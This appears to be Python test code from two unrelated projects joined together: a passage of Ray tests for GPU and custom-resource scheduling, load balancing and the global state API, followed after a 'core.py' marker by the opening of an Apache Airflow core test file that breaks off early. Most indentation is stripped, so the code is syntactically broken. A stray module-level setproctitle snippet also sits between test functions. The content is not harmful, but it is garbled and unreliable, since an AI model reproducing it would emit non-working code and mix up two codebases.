assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
        # There are only 10 GPUs, and each task uses 5 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
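        # Randomly submit 100 tasks across the six constrained remote
        # functions above, recording which variant produced each result.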
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
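        # Verify that every task ran on an object store (node) permitted by
        # the resource requirements of the function it was submitted through.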
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
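    # Repeatedly submit total_tasks copies of remote_function until each of
    # the num_nodes nodes has executed at least minimum_count of them, or
    # until num_attempts rounds have been exhausted.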
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.current_task_id.id())
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.ObjectID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.id()
assert_equal(dummy_driver_id.id(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.id(), task_driver_id)
ray.shutdown()
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.id()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
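# The assertions above check the titles Ray is expected to assign to worker
# processes. As a standalone illustration of the setproctitle calls involved
# (independent of Ray; the title string below is made up for the example):
import setproctitle

_saved_title = setproctitle.getproctitle()
setproctitle.setproctitle("ray_ExampleActor:some_method()")  # illustrative only
assert setproctitle.getproctitle() == "ray_ExampleActor:some_method()"
setproctitle.setproctitle(_saved_title)  # restore the original title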
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.ray_constants.NIL_JOB_ID.id()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
| core.py |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from typing import Optional
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, models, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks import hdfs_hook
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import (
BaseOperator, Connection, DagBag, DagModel, DagRun, Pool, TaskFail, TaskInstance, Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
